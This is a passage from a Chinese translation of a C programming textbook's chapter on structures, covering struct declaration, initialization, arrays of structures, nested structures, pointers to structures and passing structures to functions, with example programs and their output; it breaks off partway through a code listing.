0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 0 0 0 0 0 0 0 0 根据以上描述选择特定的输出字符,最终输出如下: 1004 13.用变长数组(VLA)代替标准数组,完成编程练习12。 14.数字图像,尤其是从宇宙飞船发回的数字图像,可能会包含一些失 真。为编程练习12添加消除失真的函数。该函数把每个值与它上下左右相邻 的值作比较,如果该值与其周围相邻值的差都大于1,则用所有相邻值的平 均值(四舍五入为整数)代替该值。注意,与边界上的点相邻的点少于4 个,所以做特殊处理。 [1].注意,字符串大小和字符串长度不同。前者指该字符串占用多少空间, 后者指该字符串的字符个数。——译者注 1005 第14章 结构和其他数据形式 本章介绍以下内容: 关键字:struct、union、typedef 运算符:.、-> 什么是C结构,如何创建结构模板和结构变量 如何访问结构的成员,如何编写处理结构的函数 联合和指向函数的指针 设计程序时,最重要的步骤之一是选择表示数据的方法。在许多情况 下,简单变量甚至是数组还不够。为此,C提供了结构变量(structure variable)提高你表示数据的能力,它能让你创造新的形式。如果熟悉Pascal 的记录(record),应该很容易理解结构。如果不懂Pascal也没关系,本章 将详细介绍C结构。我们先通过一个示例来分析为何需要C结构,学习如何 创建和使用结构。 1006 14.1 示例问题:创建图书目录 Gwen Glenn要打印一份图书目录。她想打印每本书的各种信息:书名、 作者、出版社、版权日期、页数、册数和价格。其中的一些项目(如,书 名)可以储存在字符数组中,其他项目需要一个int数组或float数组。用 7 个 不同的数组分别记录每一项比较繁琐,尤其是 Gwen 还想创建多份列表:一 份按书名排序、一份按作者排序、一份按价格排序等。如果能把图书目录的 信息都包含在一个数组里更好,其中每个元素包含一本书的相关信息。 因此,Gwen需要一种即能包含字符串又能包含数字的数据形式,而且 还要保持各信息的独立。C结构就满足这种情况下的需求。我们通过一个示 例演示如何创建和使用数组。但是,示例进行了一些限制。第一,该程序示 例演示的书目只包含书名、作者和价格。第二,只有一本书的数目。当然, 别忘了这只是进行了限制,我们在后面将扩展该程序。请看程序清单14.1及 其输出,然后阅读后面的一些要点。 程序清单14.1 book.c程序 //* book.c -- 
一本书的图书目录 */ #include <stdio.h> #include <string.h> char * s_gets(char * st, int n); #define MAXTITL 41  /* 书名的最大长度 + 1  */ #define MAXAUTL 31  /* 作者姓名的最大长度 + 1*/ struct book {    /* 结构模版:标记是 book */ char title[MAXTITL]; 1007 char author[MAXAUTL]; float value; };         /* 结构模版结束    */ int main(void) { struct book library; /* 把 library 声明为一个 book 类型的变量 */ printf("Please enter the book title.\n"); s_gets(library.title, MAXTITL);  /* 访问title部分*/ printf("Now enter the author.\n"); s_gets(library.author, MAXAUTL); printf("Now enter the value.\n"); scanf("%f", &library.value); printf("%s by %s: $%.2f\n", library.title, library.author, library.value); printf("%s: \"%s\" ($%.2f)\n", library.author, library.title, library.value); printf("Done.\n"); return 0; } 1008 char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     //处理输入行中剩余的字符 } return ret_val; } 我们使用前面章节中介绍的s_gets()函数去掉fgets()储存在字符串中的换 行符。下面是该例的一个运行示例: Please enter the book title. 1009 Chicken of the Andes Now enter the author. Disma Lapoult Now enter the value. 29.99 Chicken of the Andes by Disma Lapoult: $29.99 Disma Lapoult: "Chicken of the Andes" ($29.99) Done. 程序清单14.1中创建的结构有3部分,每个部分都称为成员(member) 或字段(field)。这3部分中,一部分储存书名,一部分储存作者名,一部 分储存价格。下面是必须掌握的3个技巧: 为结构建立一个格式或样式; 声明一个适合该样式的变量; 访问结构变量的各个部分。 1010 14.2 建立结构声明 结构声明(structure declaration)描述了一个结构的组织布局。声明类 似下面这样: struct book { char title[MAXTITL]; char author[MAXAUTL]; float value; }; 该声明描述了一个由两个字符数组和一个float类型变量组成的结构。该 声明并未创建实际的数据对象,只描述了该对象由什么组成。〔有时,我们 把结构声明称为模板,因为它勾勒出结构是如何储存数据的。如果读者知道 C++的模板,此模板非彼模板,C++中的模板更为强大。〕我们来分析一些 细节。首先是关键字 struct,它表明跟在其后的是一个结构,后面是一个可 选的标记(该例中是 book),稍后程序中可以使用该标记引用该结构。所 以,我们在后面的程序中可以这样声明: struct book library; 这把library声明为一个使用book结构布局的结构变量。 在结构声明中,用一对花括号括起来的是结构成员列表。每个成员都用 自己的声明来描述。例如,title部分是一个内含MAXTITL个元素的char类型 数组。成员可以是任意一种C的数据类型,甚至可以是其他结构!右花括号 后面的分号是声明所必需的,表示结构布局定义结束。可以把这个声明放在 所有函数的外部(如本例所示),也可以放在一个函数定义的内部。如果把 结构声明置于一个函数的内部,它的标记就只限于该函数内部使用。如果把 结构声明置于函数的外部,那么该声明之后的所有函数都能使用它的标记。 1011 例如,在程序的另一个函数中,可以这样声明: struct book dickens; 这样,该函数便创建了一个结构变量dickens,该变量的结构布局是 book。 结构的标记名是可选的。但是以程序示例中的方式建立结构时(在一处 定义结构布局,在另一处定义实际的结构变量),必须使用标记。我们学完 如何定义结构变量后,再来看这一点。 1012 14.3 定义结构变量 结构有两层含义。一层含义是“结构布局”,刚才已经讨论过了。结构布 局告诉编译器如何表示数据,但是它并未让编译器为数据分配空间。下一步 是创建一个结构变量,即是结构的另一层含义。程序中创建结构变量的一行 是: struct book library; 编译器执行这行代码便创建了一个结构变量library。编译器使用book模 板为该变量分配空间:一个内含MAXTITL个元素的char数组、一个内含 MAXAUTL个元素的char数组和一个float类型的变量。这些存储空间都与一 个名称library结合在一起(见图14.1)。 在结构变量的声明中,struct book所起的作用相当于一般声明中的int或 float。例如,可以定义两个struct book类型的变量,或者甚至是指向struct book类型结构的指针: struct book doyle, panshin, * ptbook; 图14.1 一个结构的内存分配 结构变量doyle和panshin中都包含title、author和value部分。指针ptbook 1013 可以指向doyle、panshin或任何其他book类型的结构变量。从本质上看, book结构声明创建了一个名为struct book的新类型。 就计算机而言,下面的声明: struct book library; 是以下声明的简化: struct book { char title[MAXTITL]; char author[AXAUTL]; float value; } library;  /* 声明的右右花括号后跟变量名*/ 换言之,声明结构的过程和定义结构变量的过程可以组合成一个步骤。 如下所示,组合后的结构声明和结构变量定义不需要使用结构标记: struct { /* 无结构标记 */ char title[MAXTITL]; char author[MAXAUTL]; float value; } library; 然而,如果打算多次使用结构模板,就要使用带标记的形式;或者,使 用本章后面介绍的typedef。 这是定义结构变量的一个方面,在这个例子中,并未初始化结构变量。 1014 14.3.1 初始化结构 初始化变量和数组如下: int count = 0; int fibo[7] = {0,1,1,2,3,5,8}; 结构变量是否也可以这样初始化?是的,可以。初始化一个结构变量 (ANSI之前,不能用自动变量初始化结构;ANSI之后可以用任意存储类 别)与初始化数组的语法类似: struct book library = { "The Pious Pirate and the Devious Damsel", "Renee Vivotte", 1.95 }; 简而言之,我们使用在一对花括号中括起来的初始化列表进行初始化, 各初始化项用逗号分隔。因此, 
title成员可以被初始化为一个字符串,value 成员可以被初始化为一个数字。为了让初始化项与结构中各成员的关联更加 明显,我们让每个成员的初始化项独占一行。这样做只是为了提高代码的可 读性,对编译器而言,只需要用逗号分隔各成员的初始化项即可。 注意 初始化结构和类别储存期 第12章中提到过,如果初始化静态存储期的变量(如,静态外部链接、 静态内部链接或静态无链接),必须使用常量值。这同样适用于结构。如果 初始化一个静态存储期的结构,初始化列表中的值必须是常量表达式。如果 是自动存储期,初始化列表中的值可以不是常量。 1015 14.3.2 访问结构成员 结构类似于一个“超级数组”,这个超级数组中,可以是一个元素为char 类型,下一个元素为forat类型,下一个元素为int数组。可以通过数组下标单 独访问数组中的各元素,那么,如何访问结构中的成员?使用结构成员运算 符——点(.)访问结构中的成员。例如,library.value即访问library的value 部分。可以像使用任何float类型变量那样使用library.value。与此类似,可以 像使用字符数组那样使用 library.title。因此,程序清单 14.1 中的程序中有 s_gets(library.title, MAXTITL);和scanf("%f", &library.value);这样的代码。 本质上,.title、.author和.value的作用相当于book结构的下标。 注意,虽然library是一个结构,但是library.value是一个float类型的变 量,可以像使用其他 float 类型变量那样使用它。例如,scanf("%f",...)需要一 个 float 类型变量的地址,而&library.float正好符合要求。.比&的优先级高, 因此这个表达式和&(library.float)一样。 如果还有一个相同类型的结构变量,可以用相同的方法: struct book bill, newt; s_gets(bill.title, MAXTITL); s_gets(newt.title, MAXTITL); .title 引用 book 结构的第 1 个成员。注意,程序清单 14.1 中的程序以两 种不同的格式打印了library结构变量中的内容。这说明可以自行决定如何使 用结构成员。 14.3.3 结构的初始化器 C99和C11为结构提供了指定初始化器(designated initializer)[1],其语 法与数组的指定初始化器类似。但是,结构的指定初始化器使用点运算符和 成员名(而不是方括号和下标)标识特定的元素。例如,只初始化book结构 1016 的value成员,可以这样做: struct book surprise = { .value = 10.99}; 可以按照任意顺序使用指定初始化器: struct book gift = { .value = 25.99, .author = "James Broadfool", .title = "Rue for the Toad"}; 与数组类似,在指定初始化器后面的普通初始化器,为指定成员后面的 成员提供初始值。另外,对特定成员的最后一次赋值才是它实际获得的值。 例如,考虑下面的代码: struct book gift= {.value = 18.90, .author = "Philionna Pestle", 0.25}; 赋给value的值是0.25,因为它在结构声明中紧跟在author成员之后。新 值0.25取代了之前的18.9。在学习了结构的基本知识后,可以进一步了解结 构的一些相关类型。 1017 14.4 结构数组 接下来,我们要把程序清单14.1的程序扩展成可以处理多本书。显然, 每本书的基本信息都可以用一个 book 类型的结构变量来表示。为描述两本 书,需要使用两个变量,以此类推。可以使用这一类型的结构数组来处理多 本书。在下一个程序中(程序清单 14.2)就创建了一个这样的数组。如果你 使用 Borland C/C++,请参阅本节后面的“Borland C和浮点数”。 结构和内存 manybook.c程序创建了一个内含100个结构变量的数组。由于该数组是 自动存储类别的对象,其中的信息被储存在栈(stack)中。如此大的数组需 要很大一块内存,这可能会导致一些问题。如果在运行时出现错误,可能抱 怨栈大小或栈溢出,你的编译器可能使用了一个默认大小的栈,这个栈对于 该例而言太小。要修正这个问题,可以使用编译器选项设置栈大小为 10000,以容纳这个结构数组;或者可以创建静态或外部数组(这样,编译 器就不会把数组放在栈中);或者可以减小数组大小为16。为何不一开始就 使用较小的数组?这是为了让读者意识到栈大小的潜在问题,以便今后再遇 到类似的问题,可以自己处理好。 程序清单14.2 manybook.c程序 /* manybook.c -- 包含多本书的图书目录 */ #include <stdio.h> #include <string.h> char * s_gets(char * st, int n); #define MAXTITL  40 #define MAXAUTL  40 1018 #define MAXBKS 100    /* 书籍的最大数量 */ struct book {      /* 简历 book 模板  */ char title[MAXTITL]; char author[MAXAUTL]; float value; }; int main(void) { struct book library[MAXBKS];  /* book 类型结构的数组 */ int count = 0; int index; printf("Please enter the book title.\n"); printf("Press [enter] at the start of a line to stop.\n"); while (count < MAXBKS && s_gets(library[count].title, MAXTITL) != NULL && library[count].title[0] != '\0') { printf("Now enter the author.\n"); s_gets(library[count].author, MAXAUTL); 1019 printf("Now enter the value.\n"); scanf("%f", &library[count++].value); while (getchar() != '\n') continue;   /* 清理输入行*/ if (count < MAXBKS) printf("Enter the next title.\n"); } if (count > 0) { printf("Here is the list of your books:\n"); for (index = 0; index < count; index++) printf("%s by %s: $%.2f\n", library[index].title, library[index].author, library[index].value); } else printf("No books? Too bad.\n"); return 0; } char * s_gets(char * st, int n) 1020 { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行中剩余的字符 } return ret_val; } 下面是该程序的一个输出示例: Please enter the book title. Press [enter] at the start of a line to stop. 
My Life as a Budgie 1021 Now enter the author. Mack Zackles Now enter the value. 12.95 Enter the next title. ...(此处省略了许多内容)... Here is the list of your books: My Life as a Budgie by Mack Zackles: $12.95 Thought and Unthought Rethought by Kindra Schlagmeyer: $43.50 Concerto for Financial Instruments by Filmore Walletz: $49.99 The CEO Power Diet by Buster Downsize: $19.25 C++ Primer Plus by Stephen Prata: $59.99 Fact Avoidance: Perception as Reality by Polly Bull: $19.97 Coping with Coping by Dr.Rubin Thonkwacker: $0.02 Diaphanous Frivolity by Neda McFey: $29.99 Murder Wore a Bikini by Mickey Splats: $18.95 A History of Buvania, Volume 8, by Prince Nikoli Buvan: $50.04 Mastering Your Digital Watch, 5nd Edition, by Miklos Mysz: $28.95 A Foregone Confusion by Phalty Reasoner: $5.99 1022 Outsourcing Government: Selection vs.Election by Ima Pundit: $33.33 Borland C和浮点数 如果程序不使用浮点数,旧式的Borland C编译器会尝试使用小版本的 scanf()来压缩程序。然而,如果在一个结构数组中只有一个浮点值(如程序 清单14.2中那样),那么这种编译器(DOS的Borland C/C++ 3.1之前的版 本,不是Borland C/C++ 4.0)就无法发现它存在。结果,编译器会生成如下 消息: scanf : floating point formats not linked Abnormal program termination 一种解决方案是,在程序中添加下面的代码: #include <math.h> double dummy = sin(0.0); 这段代码强制编译器载入浮点版本的scanf()。 首先,我们学习如何声明结构数组和如何访问数组中的结构成员。然 后,着重分析该程序的两个方面。 14.4.1 声明结构数组 声明结构数组和声明其他类型的数组类似。下面是一个声明结构数组的 例子: struct book library[MAXBKS]; 以上代码把library声明为一个内含MAXBKS个元素的数组。数组的每个 元素都是一个book类型的数组。因此,library[0]是第1个book类型的结构变 量,library[1]是第2个book类型的结构变量,以此类推。参看图14.2 可以帮 1023 助读者理解。数组名library本身不是结构名,它是一个数组名,该数组中的 每个元素都是struct book类型的结构变量。 图14.2 一个结构数组library[MAXBKS] 14.4.2 标识结构数组的成员 为了标识结构数组中的成员,可以采用访问单独结构的规则:在结构名 后面加一个点运算符,再在点运算符后面写上成员名。如下所示: library[0].value /* 第1个数组元素与value 相关联 */ library[4].title /* 第5个数组元素与title 相关联 */ 注意,数组下标紧跟在library后面,不是成员名后面: library.value[2] // 错误 library[2].value // 正确 1024 使用library[2].value的原因是:library[2]是结构变量名,正如library[1] 是另一个变量名。 顺带一提,下面的表达式代表什么? 
library[2].title[4] 这是library数组第3个结构变量(library[2]部分)中书名的第5个字符 (title[4]部分)。以程序清单14.2的输出为例,这个字符是e。该例指出,点 运算符右侧的下标作用于各个成员,点运算符左侧的下标作用与结构数组。 最后,总结一下: library        // 一个book 结构的数组 library[2]       // 一个数组元素,该元素是book结构 library[2].title    // 一个char数组(library[2]的title成员) library[2].title[4]  // 数组中library[2]元素的title 成员的一个字符 下面,我们来讨论一下这个程序。 14.4.3 程序讨论 较之程序清单14.1,该程序主要的改动之处是:插入一个while循环读取 多个项。该循环的条件测试是: while (count < MAXBKS && s_gets(library[count].title, MAXTITL) != NULL && library[count].title[0] != '\0') 表达式 s_gets(library[count].title, MAXTITL)读取一个字符串作为书名, 如果 s_gets()尝试读到文件结尾后面,该表达式则返回NULL。表达式 library[count].title[0] != '\0'判断字符串中的首字符是否是空字符(即,该字符 1025 串是否是空字符串)。如果在一行开始处用户按下 Enter 键,相当于输入了 一个空字符串,循环将结束。程序中还检查了图书的数量,以免超出数组的 大小。 然后,该程序中有如下几行: while (getchar() != '\n') continue; /* 清理输入行 */ 前面章节介绍过,这段代码弥补了scanf()函数遇到空格和换行符就结束 读取的问题。当用户输入书的价格时,可能输入如下信息: 12.50[Enter] 其传送的字符序列如下: 12.50\n scanf()函数接受1、2、.、5和0,但是把\n留在输入序列中。如果没有上 面两行清理输入行的代码,就会把留在输入序列中的换行符当作空行读入, 程序以为用户发送了停止输入的信号。我们插入的这两行代码只会在输入序 列中查找并删除\n,不会处理其他字符。这样s_gets()就可以重新开始下一次 输入。 1026 14.5 嵌套结构 有时,在一个结构中包含另一个结构(即嵌套结构)很方便。例如, Shalala Pirosky创建了一个有关她朋友信息的结构。显然,结构中需要一个 成员表示朋友的姓名。然而,名字可以用一个数组来表示,其中包含名和姓 这两个成员。程序清单14.3是一个简单的示例。 程序清单14.3 friend.c程序 // friend.c -- 嵌套结构示例 #include <stdio.h> #define LEN 20 const char * msgs[5] = { "  Thank you for the wonderful evening, ", "You certainly prove that a ", "is a special kind of guy.We must get together", "over a delicious ", " and have a few laughs" }; struct names {         // 第1个结构 char first[LEN]; char last[LEN]; 1027 }; struct guy {          // 第2个结构 struct names handle;    // 嵌套结构 char favfood[LEN]; char job[LEN]; float income; }; int main(void) { struct guy fellow = {   // 初始化一个结构变量 { "Ewen", "Villard" }, "grilled salmon", "personality coach", 68112.00 }; printf("Dear %s, \n\n", fellow.handle.first); printf("%s%s.\n", msgs[0], fellow.handle.first); printf("%s%s\n", msgs[1], fellow.job); printf("%s\n", msgs[2]); 1028 printf("%s%s%s", msgs[3], fellow.favfood, msgs[4]); if (fellow.income > 150000.0) puts("!!"); else if (fellow.income > 75000.0) puts("!"); else puts("."); printf("\n%40s%s\n", " ", "See you soon,"); printf("%40s%s\n", " ", "Shalala"); return 0; } 下面是该程序的输出: Dear Ewen, Thank you for the wonderful evening, Ewen. You certainly prove that a personality coach is a special kind of guy.We must get together over a delicious grilled salmon and have a few laughs. 
See you soon, Shalala 1029 首先,注意如何在结构声明中创建嵌套结构。和声明int类型变量一样, 进行简单的声明: struct names handle; 该声明表明handle是一个struct name类型的变量。当然,文件中也应包 含结构names的声明。 其次,注意如何访问嵌套结构的成员,这需要使用两次点运算符: printf("Hello, %s!\n", fellow.handle.first); 从左往右解释fellow.handle.first: (fellow.handle).first 也就是说,找到fellow,然后找到fellow的handle的成员,再找到handle 的first成员。 1030 14.6 指向结构的指针 喜欢使用指针的人一定很高兴能使用指向结构的指针。至少有 4 个理由 可以解释为何要使用指向结构的指针。第一,就像指向数组的指针比数组本 身更容易操控(如,排序问题)一样,指向结构的指针通常比结构本身更容 易操控。第二,在一些早期的C实现中,结构不能作为参数传递给函数,但 是可以传递指向结构的指针。第三,即使能传递一个结构,传递指针通常更 有效率。第四,一些用于表示数据的结构中包含指向其他结构的指针。 下面的程序(程序清单14.4)演示了如何定义指向结构的指针和如何用 这样的指针访问结构的成员。 程序清单14.4 friends.c程序 /* friends.c -- 使用指向结构的指针 */ #include <stdio.h> #define LEN 20 struct names { char first[LEN]; char last[LEN]; }; struct guy { struct names handle; char favfood[LEN]; char job[LEN]; 1031 float income; }; int main(void) { struct guy fellow[2] = { { { "Ewen", "Villard" }, "grilled salmon", "personality coach", 68112.00 }, { { "Rodney", "Swillbelly" }, "tripe", "tabloid editor", 432400.00 } }; struct guy * him;   /* 这是一个指向结构的指针 */ printf("address #1: %p #2: %p\n", &fellow[0], &fellow[1]); him = &fellow[0];   /* 告诉编译器该指针指向何处 */ 1032 printf("pointer #1: %p #2: %p\n", him, him + 1); printf("him->income is $%.2f: (*him).income is $%.2f\n", him->income, (*him).income); him++;        /* 指向下一个结构  */ printf("him->favfood is %s: him->handle.last is %s\n", him->favfood, him->handle.last); return 0; } 该程序的输出如下: address #1: 0x7fff5fbff820 #2: 0x7fff5fbff874 pointer #1: 0x7fff5fbff820 #2: 0x7fff5fbff874 him->income is $68112.00: (*him).income is $68112.00 him->favfood is tripe: him->handle.last is Swillbelly 我们先来看如何创建指向guy类型结构的指针,然后再分析如何通过该 指针指定结构的成员。 14.6.1 声明和初始化结构指针 声明结构指针很简单: struct guy * him; 首先是关键字 struct,其次是结构标记 guy,然后是一个星号(*),其 后跟着指针名。这个语法和其他指针声明一样。 1033 该声明并未创建一个新的结构,但是指针him现在可以指向任意现有的 guy类型的结构。例如,如果barney是一个guy类型的结构,可以这样写: him = &barney; 和数组不同的是,结构名并不是结构的地址,因此要在结构名前面加上 &运算符。 在本例中,fellow 是一个结构数组,这意味着 fellow[0]是一个结构。所 以,要让 him 指向fellow[0],可以这样写: him = &fellow[0]; 输出的前两行说明赋值成功。比较这两行发现,him指向fellow[0],him + 1指向fellow[1]。注意,him加1相当于him指向的地址加84。在十六进制 中,874 - 820 = 54(十六进制)= 84(十进制),因为每个guy结构都占用 84字节的内存:names.first占用20字节,names.last占用20字节,favfood占用 20字节,job占用20字节,income占用4字节(假设系统中float占用4字节)。 顺带一提,在有些系统中,一个结构的大小可能大于它各成员大小之和。这 是因为系统对数据进行校准的过程中产生了一些“缝隙”。例如,有些系统必 须把每个成员都放在偶数地址上,或4的倍数的地址上。在这种系统中,结 构的内部就存在未使用的“缝隙”。 14.6.2 用指针访问成员 指针him指向结构变量fellow[0],如何通过him获得fellow[0]的成员的 值?程序清单14.4中的第3行输出演示了两种方法。 第1种方法也是最常用的方法:使用->运算符。该运算符由一个连接号 (-)后跟一个大于号(>)组成。我们有下面的关系: 如果him == &barney,那么him->income 即是 barney.income 如果him == &fellow[0],那么him->income 即是 fellow[0].income 1034 换句话说,->运算符后面的结构指针和.运算符后面的结构名工作方式 相同(不能写成him.incone,因为him不是结构名)。 这里要着重理解him是一个指针,但是hime->income是该指针所指向结 构的一个成员。所以在该例中,him->income是一个float类型的变量。 第2种方法是,以这样的顺序指定结构成员的值:如果him == &fellow[0],那么*him == fellow[0],因为&和*是一对互逆运算符。因此, 可以做以下替代: fellow[0].income == (*him).income 必须要使用圆括号,因为.运算符比*运算符的优先级高。 总之,如果him是指向guy类型结构barney的指针,下面的关系恒成立: barney.income == (*him).income == him->income // 假设 him == &barney 接下来,我们来学习结构和函数的交互。 1035 14.7 向函数传递结构的信息 函数的参数把值传递给函数。每个值都是一个数字——可能是int类型、 float类型,可能是ASCII字符码,或者是一个地址。然而,一个结构比一个 单独的值复杂,所以难怪以前的C实现不允许把结构作为参数传递给函数。 当前的实现已经移除了这个限制,ANSI C允许把结构作为参数使用。所以 程序员可以选择是传递结构本身,还是传递指向结构的指针。如果你只关心 结构中的某一部分,也可以把结构的成员作为参数。我们接下来将分析这3 种传递方式,首先介绍以结构成员作为参数的情况。 14.7.1 传递结构成员 只要结构成员是一个具有单个值的数据类型(即,int及其相关类型、 char、float、double或指针),便可把它作为参数传递给接受该特定类型的 函数。程序清单14.5中的财务分析程序(初级版本)演示了这一点,该程序 把客户的银行账户添加到他/她的储蓄和贷款账户中。 程序清单14.5 funds1.c程序 /* funds1.c -- 把结构成员作为参数传递 */ #include <stdio.h> #define FUNDLEN 50 struct funds { char   bank[FUNDLEN]; double  bankfund; 
char   save[FUNDLEN]; double  savefund; 1036 }; double sum(double, double); int main(void) { struct funds stan = { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 8543.94 }; printf("Stan has a total of $%.2f.\n", sum(stan.bankfund, stan.savefund)); return 0; } /* 两个double类型的数相加 */ double sum(double x, double y) { return(x + y); } 1037 运行该程序后输出如下: Stan has a total of $12576.21. 看来,这样传递参数没问题。注意,sum()函数既不知道也不关心实际 的参数是否是结构的成员,它只要求传入的数据是double类型。 当然,如果需要在被调函数中修改主调函数中成员的值,就要传递成员 的地址: modify(&stan.bankfund); 这是一个更改银行账户的函数。 把结构的信息告诉函数的第2种方法是,让被调函数知道自己正在处理 一个结构。 14.7.2 传递结构的地址 我们继续解决前面的问题,但是这次把结构的地址作为参数。由于函数 要处理funds结构,所以必须声明funds结构。如程序清单14.6所示。 程序清单14.6 funds2.c程序 /* funds2.c -- 传递指向结构的指针 */ #include <stdio.h> #define FUNDLEN 50 struct funds { char   bank[FUNDLEN]; double  bankfund; 1038 char   save[FUNDLEN]; double  savefund; }; double sum(const struct funds *); /* 参数是一个指针 */ int main(void) { struct funds stan = { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 8543.94 }; printf("Stan has a total of $%.2f.\n", sum(&stan)); return 0; } double sum(const struct funds * money) { return(money->bankfund + money->savefund); } 1039 运行该程序后输出如下: Stan has a total of $12576.21. sum()函数使用指向funds结构的指针(money)作为它的参数。把地址 &stan传递给该函数,使得指针money指向结构stan。然后通过->运算符获取 stan.bankfund和stan.savefund的值。由于该函数不能改变指针所指向值的内 容,所以把money声明为一个指向const的指针。 虽然该函数并未使用其他成员,但是也可以访问它们。注意,必须使用 &运算符来获取结构的地址。和数组名不同,结构名只是其地址的别名。 14.7.3 传递结构 对于允许把结构作为参数的编译器,可以把程序清单14.6重写为程序清 单14.7。 程序清单14.7 funds3.c程序 /* funds3.c -- 传递一个结构 */ #include <stdio.h> #define FUNDLEN 50 struct funds { char  bank[FUNDLEN]; double bankfund; char  save[FUNDLEN]; double savefund; }; 1040 double sum(struct funds moolah); /* 参数是一个结构 */ int main(void) { struct funds stan = { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 8543.94 }; printf("Stan has a total of $%.2f.\n", sum(stan)); return 0; } double sum(struct funds moolah) { return(moolah.bankfund + moolah.savefund); } 下面是运行该程序后的输出: Stan has a total of $12576.21. 
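在分析该程序之前,先用一个简短的示意程序直观地说明"按值传递结构"意味着函数得到并操作的只是实参的一份副本(下面的代码不属于原书的程序清单,结构模板 pair 和函数名 doubler 都是为演示而假设的):
/* byvalue.c -- 示意:按值传递结构时函数只修改副本 */
#include <stdio.h>
struct pair {
    int a;
    int b;
};
void doubler(struct pair p)   /* 形参 p 是实参的副本 */
{
    p.a *= 2;                 /* 只改动副本 */
    p.b *= 2;
    printf("inside doubler: a = %d, b = %d\n", p.a, p.b);
}
int main(void)
{
    struct pair nums = { 3, 5 };
    doubler(nums);            /* 传递的是 nums 的值,不是地址 */
    printf("back in main: a = %d, b = %d\n", nums.a, nums.b);
    return 0;
}
运行后,函数内打印的是翻倍后的 6 和 10,而回到 main() 中打印的仍是 3 和 5。下面回到程序清单14.7。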
该程序把程序清单14.6中指向struct funds类型的结构指针money替换成 1041 struct funds类型的结构变量moolah。调用sum()时,编译器根据funds模板创建 了一个名为moolah的自动结构变量。然后,该结构的各成员被初始化为 stan 结构变量相应成员的值的副本。因此,程序使用原来结构的副本进行计算, 然而,传递指针的程序清单14.6使用的是原始的结构进行计算。由于moolah 是一个结构,所以该程序使用moolah.bankfund,而不是moolah->bankfund。 另一方面,由于money是指针,不是结构,所以程序清单14.6使用的是monet- >bankfund。 14.7.4 其他结构特性 现在的C允许把一个结构赋值给另一个结构,但是数组不能这样做。也 就是说,如果n_data和o_data都是相同类型的结构,可以这样做: o_data = n_data; // 把一个结构赋值给另一个结构 这条语句把n_data的每个成员的值都赋给o_data的相应成员。即使成员 是数组,也能完成赋值。另外,还可以把一个结构初始化为相同类型的另一 个结构: struct names right_field = {"Ruthie", "George"}; struct names captain = right_field; // 把一个结构初始化为另一个结构 现在的C(包括ANSI C),函数不仅能把结构本身作为参数传递,还能 把结构作为返回值返回。把结构作为函数参数可以把结构的信息传送给函 数;把结构作为返回值的函数能把结构的信息从被调函数传回主调函数。结 构指针也允许这种双向通信,因此可以选择任一种方法来解决编程问题。我 们通过另一组程序示例来演示这两种方法。 为了对比这两种方法,我们先编写一个程序以传递指针的方式处理结 构,然后以传递结构和返回结构的方式重写该程序。 程序清单14.8 names1.c程序 1042 /* names1.c -- 使用指向结构的指针 */ #include <stdio.h> #include <string.h> #define NLEN 30 struct namect { char fname[NLEN]; char lname[NLEN]; int letters; }; void getinfo(struct namect *); void makeinfo(struct namect *); void showinfo(const struct namect *); char * s_gets(char * st, int n); int main(void) { struct namect person; getinfo(&person); makeinfo(&person); showinfo(&person); 1043 return 0; } void getinfo(struct namect * pst) { printf("Please enter your first name.\n"); s_gets(pst->fname, NLEN); printf("Please enter your last name.\n"); s_gets(pst->lname, NLEN); } void makeinfo(struct namect * pst) { pst->letters = strlen(pst->fname) +strlen(pst->lname); } void showinfo(const struct namect * pst) { printf("%s %s, your name contains %d letters.\n", pst->fname, pst->lname, pst->letters); } char * s_gets(char * st, int n) 1044 { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行的剩余字符 } return ret_val; } 下面是编译并运行该程序后的一个输出示例: Please enter your first name. Viola Please enter your last name. 1045 Plunderfest Viola Plunderfest, your name contains 16 letters. 
该程序把任务分配给3个函数来完成,都在main()中调用。每调用一个 函数就把person结构的地址传递给它。 getinfo()函数把结构的信息从自身传递给main()。该函数通过与用户交互 获得姓名,并通过pst指针定位,将其放入 person 结构中。由于 pst->lname 意味着 pst 指向结构的 lname 成员,这使得pst->lname等价于char数组的名 称,因此做s_gets()的参数很合适。注意,虽然getinfo()给main()提供了信 息,但是它并未使用返回机制,所以其返回类型是void。 makeinfo()函数使用双向传输方式传送信息。通过使用指向 person 的指 针,该指针定位了储存在该结构中的名和姓。该函数使用C库函数strlen()分 别计算名和姓中的字母总数,然后使用person的地址储存两数之和。同样, makeinfo()函数的返回类型也是void。 showinfo()函数使用一个指针定位待打印的信息。因为该函数不改变数 组的内容,所以将其声明为const。 所有这些操作中,只有一个结构变量 person,每个函数都使用该结构变 量的地址来访问它。一个函数把信息从自身传回主调函数,一个函数把信息 从主调函数传给自身,一个函数通过双向传输来传递信息。 现在,我们来看如何使用结构参数和返回值来完成相同的任务。第一, 为了传递结构本身,函数的参数必须是person,而不是&person。那么,相 应的形式参数应声明为struct namect,而不是指向该类型的指针。第二,可 以通过返回一个结构,把结构的信息返回给main()。程序清单14.9演示了不 使用指针的版本。 程序清单14.9 names2.c程序 /* names2.c -- 传递并返回结构 */ 1046 #include <stdio.h> #include <string.h> #define NLEN 30 struct namect { char fname[NLEN]; char lname[NLEN]; int letters; }; struct namect getinfo(void); struct namect makeinfo(struct namect); void showinfo(struct namect); char * s_gets(char * st, int n); int main(void) { struct namect person; person = getinfo(); person = makeinfo(person); showinfo(person); return 0; 1047 } struct namect getinfo(void) { struct namect temp; printf("Please enter your first name.\n"); s_gets(temp.fname, NLEN); printf("Please enter your last name.\n"); s_gets(temp.lname, NLEN); return temp; } struct namect makeinfo(struct namect info) { info.letters = strlen(info.fname) + strlen(info.lname); return info; } void showinfo(struct namect info) { printf("%s 